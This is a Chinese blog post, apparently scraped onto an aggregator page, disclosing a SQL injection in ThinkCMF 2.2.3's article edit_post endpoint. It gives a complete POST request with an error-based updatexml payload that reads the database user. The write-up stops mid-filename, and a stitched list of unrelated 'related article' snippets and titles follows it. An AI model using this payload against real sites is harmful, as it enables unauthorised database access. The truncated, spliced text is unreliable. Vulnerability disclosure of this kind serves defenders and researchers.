thinkcmf漏洞集合

在先知逛的时候看到的的,后面发现是thinkcmf 翻了一下自己的漏洞库对比了一下版本发现,泡泡大佬这里看的是1.6版本的,而官方最后的版本 2.2.3 所以做一下漏洞补充。

注:thinkcmf 并没有死,他拥有两个版本一个是 thinkcmf5 一个是 thnkcmf2.2.3 但是这两个版本都有漏洞,因为现在thinkcmf2.2.3使用的人越来越少了,所以爆出来,至于5嘛,=-=不好意思,我还有用,所以不能发,请见谅

0x01 前台用户文章编辑提交存在注入

0x01.1 漏洞演示

前台的文章编辑中操作框架注入,所以可以直接sql注入

url:http://thinkcmf.test/index.php?g=Portal&m=Article&a=edit_post

post:

term:123

post[post_title]:123

post[post_title]:aaa

post_title:123

post[id][0]:bind

post[id][1]:0 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))

t01.png (323.43 KB, 下载次数: 2)

2019-5-20 15:50 上传

0x01.2 漏洞原理

文件:ThinkCMFX_2.2.3\application\Portal\Controller\ArticleController.cl

thinkcmfx漏洞太大_thinkcmf漏洞集合相关推荐

  1. 阿里云滑块验证漏洞太大。

    真难想象像阿里这样的公司,竟然做出这么差的滑块验证产品 阿里滑块有漏洞 阿里的滑块漏洞可以直接提前获取,包过,跟他们客服反应,没有人回应,真不知道这样的产品是如何上线还出售的. 不相信的,直接验证.站 ...

  2. thinkcmfx漏洞太大_ThinkCMF5 代码执行漏洞及后续有关思考

    摘要 修改配置时,大多数情况下都会对配置文件/缓存文件/数据库进行操作,而在这个过程中不论如何实现,几乎都会对"管理员" 所做的修改输入有过滤.当绕过了这些过滤方法之后,通常可以达 ...

  3. SSRF 漏洞危害大,应避免被利用攻击内网应用!| 原力计划

    作者 | Qwzf 责编 | 夕颜 头图 | CSDN付费下载自视觉中国 出品 | CSDN博客 前言 SSRF漏洞和CSRF漏洞有一些相似之处:CSRF跨站请求伪造,基于客户端的请求伪造:SSRF服 ...

  4. python中常见的漏洞_Python常见安全漏洞及修复方法集合!你所不会的这里都有!...

    [51CTO技术沙龙]10月27日,让我们共同探索AI场景化应用实现之道 --> 概述 编写安全的代码很困难,当你学习一门编程语言.一个模块或框架时,你会学习其使用方法.在考虑安全性时,你需要考 ...

  5. “熊孩子”乱敲键盘就攻破了Linux桌面,其父亲发现linux漏洞,大神17年前就已经警告

    来源:量子位 Linux系统,居然被两个不懂任何技术的小孩"攻破"了. 他们只是在键盘和屏幕上一通乱按,就轻松绕过密码,进入了被锁定的Linux系统桌面. 最近,一位程序员父亲就这 ...

  6. 10大Web漏洞扫描工具

    Web scan tool 推荐10大Web漏洞扫描程序 Nikto 这是一个开源的Web服务器扫描程序,它可以对Web服务器的多种项目(包括3500个潜在的危险文件/CGI,以及超过900个服务器版 ...

  7. 【安全工具】全!十大Web漏洞扫描工具

    十大Web漏洞扫描工具 Acunetix Web Vulnerability Scanner[( 简称AwVS ) AwVS是一款知名的Web网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行 ...

  8. Web 应用程序的十大安全漏洞

    应用程序的安全性非常重要,解决安全问题的方法有很多,但一个有效的入门方法是解决 OWASP(开放 Web 应用程序安全项目)确定的十大安全问题.在本文中,我们将介绍当前应用程序的十大安全漏洞. OWA ...

  9. 10大Web漏洞扫描器

    10大Web漏洞扫描器 美国最权威的RSA大会研究显示,Web应用安全已超过所有以前网络层安全(如DDos),逐渐成为最严重.最广泛.危害性最大的安全问题.如华为.RSA.赛门铁克.联想ThinkPa ...

最新文章

  1. Linux下基于密钥的安全验证实现方法
  2. 敲响警钟!智能汽车数据正在被“偷运出境”!
  3. Leetcode No.145 **
  4. qpython3l_介绍一下手机里能敲Python代码的软件,QPython3L和Pydroid3,顺便用有道翻译一下后者...
  5. 怎么下载并安装python_怎么下载官网python并安装
  6. GameObject.Find 使用技巧
  7. r语言调用python_python3调用R语言干货
  8. 天锐绿盾防泄密软件6.0新版本功能已优化!!!
  9. ppt讲解中的过渡_ppt过渡页的设计技巧
  10. 【软件工程】山东大学软件工程复习提纲
  11. VAX/VMS虚拟内存系统
  12. sqlite报错database is locked
  13. 电脑假死卡的动不了_win10电脑突然卡死动不了怎么办 四种方法快速解决电脑卡死...
  14. 什么是群、什么是阿贝尔群(abel群、阿贝尔群也称为交换群或可交换群)、群论入门
  15. 重新定义团队 谷歌的自由精神对所有公司都适用
  16. 智能语音输入厂家对比 百度语音 阿里语音 华为语音 讯飞灵云智声
  17. C#iText7对PDF进行签章
  18. 论文笔记:Hashtag2Vec: Learning Hashtag Representation with Relational Hierarchical Embedding Model
  19. lamport面包店算法详细讲解及代码实现
  20. The Codeless Code: Case 5 Void(void本质是什么)

热门文章

  1. 2017年,电视到底该怎么买?
  2. 微信小程序云开发之云函数使用
  3. 联想MIIX520笔记本电脑屏幕亮度无法调节问题
  4. HDC.Cloud 华为开发者大会2021.04.24 学习记录
  5. 现代计算机控制理论及应用王万良 pdf,计算机}j现代化.PDF
  6. u盘文件不显示却占空间解决办法
  7. OpenCV实战(2)——OpenCV核心数据结构
  8. Manjaro KDE 18.1.2踩坑指南(含双显卡黑屏解决方案)
  9. 零基础学SQL(1):初识数据库与SQL
  10. java 前后台json的传递